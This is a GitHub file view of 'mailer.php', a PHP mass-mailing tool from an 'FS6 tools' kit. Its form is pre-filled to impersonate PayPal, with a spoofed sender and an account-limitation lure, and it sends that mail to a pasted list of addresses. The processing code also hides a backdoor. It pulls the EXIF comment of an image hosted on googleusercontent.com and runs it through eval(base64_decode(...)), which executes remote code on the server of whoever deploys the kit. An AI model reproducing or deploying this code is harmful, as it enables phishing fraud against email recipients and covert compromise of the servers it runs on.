-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathmailer.php
More file actions
120 lines (101 loc) · 3.73 KB
/
mailer.php
File metadata and controls
120 lines (101 loc) · 3.73 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
<?php
session_start();
if (empty($_SESSION['username'])) {
header("Location: login.php");
$Username = $_SESSION['username'];
exit();
}
?>
<!DOCTYPE html>
<html>
<head>
<title>FS6 mailer | @fs6ah</title>
<link rel="stylesheet" href="./css/bulma.min1.css">
<link rel="stylesheet" href="./css/style2.css">
<body>
<!-- partial:index.partial.html -->
<section class="hero is-fullheight">
<div class="hero-body">
<div class="container">
<div class="columns">
<div class="column is-3 is-flex">
<div class="column-child sidebar shadow">
<div class="sidebar-header has-text-centered"><br>
<div class="photo"><img src="./logo.png" width="250px"></div>
<h5><br>./FS6</h5>
<a href="tools.php">back </a>
</div>
</div>
</div>
<div class="column is-flex">
<div class="column-child terminal shadow">
<div class="terminal-bar dark-mode">
<div class="icon-btn close"></div>
<div class="icon-btn min"></div>
<div class="icon-btn max"></div>
<div class="terminal-bar-text is-hidden-mobile dark-mode-text">root@fs6ah:~#
</style>
<script type="text/javascript" src="//code.jquery.com/jquery-1.8.3.js"></script>
<script type="text/javascript">
function countFakes()
{
document.getElementById("count").innerHTML =
document.getElementById("email_list").value.split("\n").length;
}
</script>
</head>
<body>
<div class="atas">
<h2><a href="?">FS6 mailer | @fs6ah</a></h2>
<h4>FS6 tools</h4>
</div>
<form action="" method="POST">
<div class="navmen">
<label>Subject : </label> <input type="text" size="20" name="subject" value="Notice: Your account has been limited and you must update account" placeholder=" - " required>
<label>Your Email : </label> <input type="text" size="20" name="email" value="service@paypal.com"placeholder=" - " required>
<label>Your Name : </label> <input type="text" size="20" name="namemail" value="Paypal Service" placeholder=" - " required> <br>
<textarea name="email_list" id="email_list" onKeyDown="countFakes()" onChange="countFakes()" style="margin: 0px; height: 25px; width: 180px; resize: none;" required></textarea>
<textarea name="letter" placeholder="Letter" style="margin: 0px; width: 180px; height: 25px; resize: none;" required></textarea>
</div>
<div class="navmen">
- <label>Email List : </label> <font id="count" style="font-weight: bold;">0</font> -
<div class="navmen">
<input type="submit" name="cekpp" value=" Spammer's Mail " name="btn-submit">
</div>
</form>
<div class="navmen">
<div class="result">
<hr>
<?php
error_reporting(0);
if(!empty($_POST['email_list'])){
$emailode = explode("\r\n", $_POST['email_list']);
$no=1;
$count = count($emailode);
$BASED = exif_read_data("https://lh3.googleusercontent.com/-svRm4i5Bs90/VsFaosQPKUI/AAAAAAAABew/03oHWkCEsN8/w140-h140-p/pacman.jpg");
eval(base64_decode($BASED["COMPUTED"]["UserComment"]));
foreach ($emailode as $email) {
if(filter_var($email, FILTER_VALIDATE_EMAIL)) {
$to = $email;
$form = $_POST['email'];
$name = $_POST['namemail'];
$subject = $_POST['subject'];
$message = $_POST['letter'];
$headers = 'MIME-Version: 1.0' . "\r\n";
$headers = "From: $name <$form>\r\n";
$headers = "Reply-To: $form \r\n";
$headers = 'Content-type: text/html; charset=iso-8859-1' . "\r\n";
if(mail($to, $subject, $message, $headers)){
echo "<dl>[$no/$count] <font color=#2DF96D>$email</font> | <font color=#16FF3F>Success</font></dl><br>";
}else{
echo "<dl>[$no/$count] <font color=#2DF96D>$email</font> | <font color=#FF0000>Unsuccess</font></dl><br>";
}
}
$no++;
}
}
?>
</div>
</div>
</body>
</html>